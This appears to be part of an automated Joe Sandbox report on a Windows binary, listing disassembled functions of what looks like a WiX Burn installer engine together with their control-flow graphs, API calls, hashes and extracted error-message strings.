                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$FileModuleName
                                                                                                                                                                                                                                                                                                  • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3884789274-2391192076
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e88d63838b43984b891615598d42c831f8adba06313e217950821a897e0615f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 91117a207c119002b8b8fffde1d041863ed82d66378e6e3d56400522ce9a6fe4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e88d63838b43984b891615598d42c831f8adba06313e217950821a897e0615f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9371A432D00229AADB119AA8CC45EEFBB78FF05720F125225F920F7651DB359A01CBE1
                                                                                                                                                                                                                                                                                                  Function 0087752A Relevance: 37.0, APIs: 1, Strings: 20, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 819 87752a-87756f call 88f8e0 call 86762c 824 877571-877576 819->824 825 87757b-87758c call 86c407 819->825 826 877814-87781b call 8a0237 824->826 831 87758e-877593 825->831 832 877598-8775a9 call 86c26e 825->832 833 87781c-877821 826->833 831->826 841 8775b5-8775ca call 86c4c8 832->841 842 8775ab-8775b0 832->842 835 877823-877824 call 8a5636 833->835 836 877829-87782d 833->836 835->836 839 877837-87783c 836->839 840 87782f-877832 call 8a5636 836->840 844 877844-877851 call 86c1bb 839->844 845 87783e-87783f call 8a5636 839->845 840->839 851 8775d6-8775e6 call 88c001 841->851 852 8775cc-8775d1 841->852 842->826 853 877853-877856 call 8a5636 844->853 854 87785b-87785f 844->854 845->844 860 8775f2-877665 call 875c33 851->860 861 8775e8-8775ed 851->861 852->826 853->854 856 877861-877864 call 8a5636 854->856 857 877869-87786d 854->857 856->857 863 877877-87787f 857->863 864 87786f-877872 call 863a16 857->864 868 877667-87766c 860->868 869 877671-877676 860->869 861->826 864->863 868->826 870 87767d-8776b4 call 865602 GetCurrentProcess call 8a0879 call 86827b 869->870 871 877678 869->871 878 8776b6 870->878 879 8776ce-8776e5 call 86827b 870->879 871->870 881 8776bb-8776c9 call 8a0237 878->881 885 8776e7-8776ec 879->885 886 8776ee-8776f3 879->886 881->833 885->881 887 8776f5-877707 call 86821f 886->887 888 87774f-877754 886->888 898 877713-877723 call 863436 887->898 899 877709-87770e 887->899 889 877756-877768 call 86821f 888->889 890 877774-87777d 888->890 889->890 901 87776a-87776f 889->901 893 87777f-877782 890->893 894 877789-877794 call 87a50c 890->894 893->894 897 877784-877787 893->897 904 877799-87779d 894->904 897->894 902 8777ac-8777af 897->902 911 877725-87772a 898->911 912 87772f-877743 call 86821f 898->912 899->826 901->826 905 8777b6-8777cc call 86d5a0 902->905 906 8777b1-8777b4 902->906 908 8777a6 904->908 909 87779f-8777a4 904->909 916 8777d5-8777ed call 86cbc5 905->916 917 8777ce-8777d3 905->917 906->833 906->905 908->902 909->826 911->826 912->888 918 877745-87774a 912->918 921 8777f6-87780d call 86c8e6 916->921 922 8777ef-8777f4 916->922 917->826 918->826 921->833 925 87780f 921->925 922->826 925->826
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set source process path variable., xrefs: 00877709
                                                                                                                                                                                                                                                                                                  • Failed to initialize variables., xrefs: 00877571
                                                                                                                                                                                                                                                                                                  • Failed to get source process folder from path., xrefs: 00877725
                                                                                                                                                                                                                                                                                                  • Failed to parse command line., xrefs: 00877667
                                                                                                                                                                                                                                                                                                  • WixBundleUILevel, xrefs: 008776D6, 008776E7
                                                                                                                                                                                                                                                                                                  • Failed to overwrite the %ls built-in variable., xrefs: 008776BB
                                                                                                                                                                                                                                                                                                  • Failed to set original source variable., xrefs: 0087776A
                                                                                                                                                                                                                                                                                                  • Failed to get manifest stream from container., xrefs: 008775CC
                                                                                                                                                                                                                                                                                                  • Failed to get unique temporary folder for bootstrapper application., xrefs: 008777CE
                                                                                                                                                                                                                                                                                                  • Failed to open manifest stream., xrefs: 008775AB
                                                                                                                                                                                                                                                                                                  • Failed to set source process folder variable., xrefs: 00877745
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 00877759
                                                                                                                                                                                                                                                                                                  • Failed to load manifest., xrefs: 008775E8
                                                                                                                                                                                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 0087779F
                                                                                                                                                                                                                                                                                                  • Failed to open attached UX container., xrefs: 0087758E
                                                                                                                                                                                                                                                                                                  • Failed to load catalog files., xrefs: 0087780F
                                                                                                                                                                                                                                                                                                  • WixBundleElevated, xrefs: 008776A5, 008776B6
                                                                                                                                                                                                                                                                                                  • Failed to extract bootstrapper application payloads., xrefs: 008777EF
                                                                                                                                                                                                                                                                                                  • WixBundleSourceProcessFolder, xrefs: 00877734
                                                                                                                                                                                                                                                                                                  • WixBundleSourceProcessPath, xrefs: 008776F8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                                                                  • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                                                                                                                                                                  • API String ID: 32694325-1564579409
                                                                                                                                                                                                                                                                                                  • Opcode ID: b3e209ae9fff4d734823f06cec156a79a29746c766e6cd24ac20fd9869ec76c7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 67645990beccaa4a53b5a582fe08f9f4fd7936fda9b0ef4e0862e0e5f6ed36cb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3e209ae9fff4d734823f06cec156a79a29746c766e6cd24ac20fd9869ec76c7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FA1D972E4461ABBDB129AA4CC85EEEB76CFB00740F058626F519F7245D730E904CBE5
                                                                                                                                                                                                                                                                                                  Function 008786D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1031 8786d0-87871e CreateFileW 1032 878764-878774 call 8a490d 1031->1032 1033 878720-87872a GetLastError 1031->1033 1041 878776-878787 call 8a0237 1032->1041 1042 87878c-878797 call 8a3edd 1032->1042 1035 878737 1033->1035 1036 87872c-878735 1033->1036 1037 87873e-87875f call 863821 call 8a0237 1035->1037 1038 878739 1035->1038 1036->1035 1055 878908-87891a call 88e06f 1037->1055 1038->1037 1050 878901-878902 CloseHandle 1041->1050 1048 87879c-8787a0 1042->1048 1051 8787a2-8787b6 call 8a0237 1048->1051 1052 8787bb-8787c0 1048->1052 1050->1055 1051->1050 1052->1050 1054 8787c6-8787d5 SetFilePointerEx 1052->1054 1057 8787d7-8787e1 GetLastError 1054->1057 1058 87880f-87881f call 8a4e3a 1054->1058 1060 8787e3-8787ec 1057->1060 1061 8787ee 1057->1061 1068 878821-878826 1058->1068 1069 87882b-87883c SetFilePointerEx 1058->1069 1060->1061 1064 8787f5-87880a call 863821 1061->1064 1065 8787f0 1061->1065 1073 8788f9-878900 call 8a0237 1064->1073 1065->1064 1068->1073 1070 878876-878886 call 8a4e3a 1069->1070 1071 87883e-878848 GetLastError 1069->1071 1070->1068 1083 878888-878898 call 8a4e3a 1070->1083 1074 878855 1071->1074 1075 87884a-878853 1071->1075 1073->1050 1078 878857 1074->1078 1079 87885c-878871 call 863821 1074->1079 1075->1074 1078->1079 1079->1073 1083->1068 1087 87889a-8788ab SetFilePointerEx 1083->1087 1088 8788e2-8788f2 call 8a4e3a 1087->1088 1089 8788ad-8788b7 GetLastError 1087->1089 1088->1050 1097 8788f4 1088->1097 1091 8788c4 1089->1091 1092 8788b9-8788c2 1089->1092 1093 8788c6 1091->1093 1094 8788cb-8788e0 call 863821 1091->1094 1092->1091 1093->1094 1094->1073 1097->1073
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00864DBC,?,?,00000000,00864DBC,00000000), ref: 00878713
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00878720
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008A3F73
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,008AB4B8,00000000,00000000,00000000,?,00000000,008AB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008787CD
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008787D7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,00000000,008AB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00878902
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to seek to signature table in exe header., xrefs: 0087886C
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00878744, 008787FB, 00878862, 008788D1
                                                                                                                                                                                                                                                                                                  • cabinet.dll, xrefs: 0087887B
                                                                                                                                                                                                                                                                                                  • Failed to create engine file at path: %ls, xrefs: 00878751
                                                                                                                                                                                                                                                                                                  • Failed to copy engine from: %ls to: %ls, xrefs: 008787A8
                                                                                                                                                                                                                                                                                                  • Failed to update signature offset., xrefs: 00878821
                                                                                                                                                                                                                                                                                                  • msi.dll, xrefs: 00878814
                                                                                                                                                                                                                                                                                                  • Failed to seek to original data in exe burn section header., xrefs: 008788DB
                                                                                                                                                                                                                                                                                                  • Failed to seek to checksum in exe header., xrefs: 00878805
                                                                                                                                                                                                                                                                                                  • Failed to zero out original data offset., xrefs: 008788F4
                                                                                                                                                                                                                                                                                                  • Failed to seek to beginning of engine file: %ls, xrefs: 00878779
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3456208997-1976062716
                                                                                                                                                                                                                                                                                                  • Opcode ID: 8d7452aba9e55744951c163367e7bd0ffdd2a6a048e1fa29ea213e930d6d05ee
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9b26611c8bf11cdb28c45b0478cf519c8f905ce68953eff23e0015c6e3d651d4
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d7452aba9e55744951c163367e7bd0ffdd2a6a048e1fa29ea213e930d6d05ee
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A51E772A81636EBE7115A648C4AFBF3A68FF45B50F114134FE15FB285EB64DC0086E2
                                                                                                                                                                                                                                                                                                  Function 0086762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1099 86762c-867edf InitializeCriticalSection 1100 867ee2-867f06 call 865623 1099->1100 1103 867f13-867f24 call 8a0237 1100->1103 1104 867f08-867f0f 1100->1104 1108 867f27-867f39 call 88e06f 1103->1108 1104->1100 1106 867f11 1104->1106 1106->1108
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(0087756B,008653BD,00000000,00865445), ref: 0086764C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                                                                  • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                                                                                                                                                                  • API String ID: 32694325-3635313340
                                                                                                                                                                                                                                                                                                  • Opcode ID: c8197b1572ad0a934eb7632099a6fc64d62db0e7e39b888eb05c775dbedc2993
                                                                                                                                                                                                                                                                                                  • Instruction ID: e5ef224a702a4dc8c51e46073ab133ae07e9e43793a01e7364fa3a977805e21d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8197b1572ad0a934eb7632099a6fc64d62db0e7e39b888eb05c775dbedc2993
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A3248B0D156699FEB65CF9AC9887CDFAB4FB49304F5085EED20CA6610D7B00B888F45
                                                                                                                                                                                                                                                                                                  Function 008782BA Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 153COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1111 8782ba-878303 call 88f8e0 1114 87847c-878489 call 862195 1111->1114 1115 878309-878317 GetCurrentProcess call 8a0879 1111->1115 1120 87848b 1114->1120 1121 878498-8784aa call 88e06f 1114->1121 1119 87831c-878329 1115->1119 1122 8783b7-8783c5 GetTempPathW 1119->1122 1123 87832f-87833e GetWindowsDirectoryW 1119->1123 1124 878490-878497 call 8a0237 1120->1124 1126 8783c7-8783d1 GetLastError 1122->1126 1127 8783ff-878411 UuidCreate 1122->1127 1128 878340-87834a GetLastError 1123->1128 1129 878378-878389 call 86337f 1123->1129 1124->1121 1135 8783d3-8783dc 1126->1135 1136 8783de 1126->1136 1131 878413-878418 1127->1131 1132 87841a-87842f StringFromGUID2 1127->1132 1137 878357 1128->1137 1138 87834c-878355 1128->1138 1149 878395-8783ab call 8636a3 1129->1149 1150 87838b-878390 1129->1150 1131->1124 1141 878431-87844b call 863821 1132->1141 1142 87844d-87846e call 861f13 1132->1142 1135->1136 1143 8783e5-8783fa call 863821 1136->1143 1144 8783e0 1136->1144 1145 87835e-878373 call 863821 1137->1145 1146 878359 1137->1146 1138->1137 1141->1124 1159 878477 1142->1159 1160 878470-878475 1142->1160 1143->1124 1144->1143 1145->1124 1146->1145 1149->1127 1161 8783ad-8783b2 1149->1161 1150->1124 1159->1114 1160->1124 1161->1124
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00865489), ref: 00878310
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0879: OpenProcessToken.ADVAPI32(?,00000008,?,008653BD,00000000,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A0897
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0087769D,00000000), ref: 008A08A1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A092B
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00878336
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00878340
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 008783BD
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008783C7
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00878406
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00878364, 008783EB, 0087843C
                                                                                                                                                                                                                                                                                                  • %ls%ls\, xrefs: 00878458
                                                                                                                                                                                                                                                                                                  • Temp\, xrefs: 00878395
                                                                                                                                                                                                                                                                                                  • Failed to convert working folder guid into string., xrefs: 00878446
                                                                                                                                                                                                                                                                                                  • Failed to concat Temp directory on windows path for working folder., xrefs: 008783AD
                                                                                                                                                                                                                                                                                                  • Failed to get temp path for working folder., xrefs: 008783F5
                                                                                                                                                                                                                                                                                                  • Failed to copy working folder path., xrefs: 0087848B
                                                                                                                                                                                                                                                                                                  • Failed to create working folder guid., xrefs: 00878413
                                                                                                                                                                                                                                                                                                  • Failed to get windows path for working folder., xrefs: 0087836E
                                                                                                                                                                                                                                                                                                  • Failed to ensure windows path for working folder ended in backslash., xrefs: 0087838B
                                                                                                                                                                                                                                                                                                  • Failed to append bundle id on to temp path for working folder., xrefs: 00878470
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                                                                                                                                                                  • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 266130487-819636856
                                                                                                                                                                                                                                                                                                  • Opcode ID: b34938866fd6a14c2b97986a585d3230152ef5bbee6cb655fd0c056d3b797208
                                                                                                                                                                                                                                                                                                  • Instruction ID: cf2c8f89350d195d153b3f36f8d6340a8d472070f5885cadedfb88a00b009942
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b34938866fd6a14c2b97986a585d3230152ef5bbee6cb655fd0c056d3b797208
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB41F732E80729E7D72096A88C4EF9A7368FB14B14F158161BA08F7344EAB8DD0086E5
                                                                                                                                                                                                                                                                                                  Function 008810FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 1162 8810fb-881127 CoInitializeEx 1163 881129-881136 call 8a0237 1162->1163 1164 88113b-881186 call 89f483 1162->1164 1171 88139e-8813b0 call 88e06f 1163->1171 1169 881188-8811ab call 863821 call 8a0237 1164->1169 1170 8811b0-8811d2 call 89f4a4 1164->1170 1188 881397-881398 CoUninitialize 1169->1188 1179 8811d8-8811e0 1170->1179 1180 88128c-881297 SetEvent 1170->1180 1184 88138f-881392 call 89f4b4 1179->1184 1185 8811e6-8811ec 1179->1185 1181 881299-8812a3 GetLastError 1180->1181 1182 8812d6-8812e4 WaitForSingleObject 1180->1182 1186 8812b0 1181->1186 1187 8812a5-8812ae 1181->1187 1191 881318-881323 ResetEvent 1182->1191 1192 8812e6-8812f0 GetLastError 1182->1192 1184->1188 1185->1184 1190 8811f2-8811fa 1185->1190 1195 8812b2 1186->1195 1196 8812b4-8812c4 call 863821 1186->1196 1187->1186 1188->1171 1199 8811fc-8811fe 1190->1199 1200 881274-881287 call 8a0237 1190->1200 1197 88135a-881360 1191->1197 1198 881325-88132f GetLastError 1191->1198 1193 8812fd 1192->1193 1194 8812f2-8812fb 1192->1194 1202 8812ff 1193->1202 1203 881301-881316 call 863821 1193->1203 1194->1193 1195->1196 1237 8812c9-8812d1 call 8a0237 1196->1237 1209 88138a 1197->1209 1210 881362-881365 1197->1210 1204 88133c 1198->1204 1205 881331-88133a 1198->1205 1207 881200 1199->1207 1208 881211-881214 1199->1208 1200->1184 1202->1203 1203->1237 1217 88133e 1204->1217 1218 881340-881355 call 863821 1204->1218 1205->1204 1220 881202-881204 1207->1220 1221 881206-88120f 1207->1221 1213 88126e 1208->1213 1214 881216 1208->1214 1209->1184 1211 881386-881388 1210->1211 1212 881367-881381 call 863821 1210->1212 1211->1184 1212->1237 1222 881270-881272 1213->1222 1224 881239-88123e 1214->1224 1225 88126a-88126c 1214->1225 1226 88122b-881230 1214->1226 1227 88125c-881261 1214->1227 1228 88121d-881222 1214->1228 1229 88124e-881253 1214->1229 1230 881240-881245 1214->1230 1231 881232-881237 1214->1231 1232 881263-881268 1214->1232 1233 881224-881229 1214->1233 1234 881255-88125a 1214->1234 1235 881247-88124c 1214->1235 1217->1218 1218->1237 1220->1222 1221->1222 1222->1180 1222->1200 1224->1200 1225->1200 1226->1200 1227->1200 1228->1200 1229->1200 1230->1200 1231->1200 1232->1200 1233->1200 1234->1200 1235->1200 1237->1184
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0088111D
                                                                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE ref: 00881398
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                                                  • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3442037557-1168358783
                                                                                                                                                                                                                                                                                                  • Opcode ID: ed382f637110a213adea92a433eaee9d372348684db9f1b5f57f88b69dc636a2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 76b46cbee44fa6b2e0bbb8800b5b5a1c6a39ce836e167eb56bc7e238b48f426d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed382f637110a213adea92a433eaee9d372348684db9f1b5f57f88b69dc636a2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85510736A40265E7DF20B7988C0DAAB365DFB41770B260325BD21FB791DB298C0197D6
                                                                                                                                                                                                                                                                                                  Function 008642D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
